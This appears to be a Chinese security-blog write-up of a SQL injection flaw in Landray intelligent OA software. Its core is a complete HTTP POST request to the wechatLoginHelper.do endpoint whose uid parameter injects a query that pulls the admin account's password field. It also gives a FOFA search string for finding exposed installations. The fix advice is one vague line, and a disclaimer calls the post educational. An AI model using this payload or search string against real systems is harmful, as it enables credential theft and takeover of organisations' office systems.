目錄

一.概述

二 .漏洞影響

三.漏洞復現

1. 漏洞一：

四.修復建議：

五. 搜索語法：

六.免責聲明

---

一.概述

藍凌智能OA是由深圳市藍凌軟件股份有限公司開發，是一款針對中小企業的移動化智能辦公產品，融合了釘釘數字化能力與藍凌多年OA產品與服務經驗，能全面滿足企業日常辦公在線、企業文化在線、客戶管理在線、人事服務在線、行政務服務在線等需求。

二 .漏洞影響

????????攻擊者未經授權可以訪問數據庫中的數據，盜取用戶的隱私以及個人信息，造成用戶的信息泄露。 可以對數據庫的數據進行增加或刪除操作，例如私自添加或刪除管理員賬號。甚至拿到服務器權限。

三.漏洞復現

1. 漏洞一：

（1）漏洞類型：? SQL注入

（2）請求類型：POST

（3）復現

找到相關系統

---

請求漏洞點，查看burp響應

---

burp請求包

POST /third/wechat/wechatLoginHelper.do HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 147method=edit&uid=1'and+(SELECT+fdPassword%2B'----'+FROM+com.landray.kmss.sys.organization.model.SysOrgPerson+where+fdLoginName='admin')=1+and+'1'='1

四.修復建議：

對變量做好過濾和檢測。

五. 搜索語法：

1.fofa

app="Landray-OA系統"

六.免責聲明

本文所涉及的任何技術、信息或工具，僅供學習和參考之用。請勿利用本文提供的信息從事任何違法活動或不當行為。任何因使用本文所提供的信息或工具而導致的損失、后果或不良影響，均由使用者個人承擔責任，與本文作者無關。作者不對任何因使用本文信息或工具而產生的損失或后果承擔任何責任。使用本文所提供的信息或工具即視為同意本免責聲明，并承諾遵守相關法律法規和道德規范。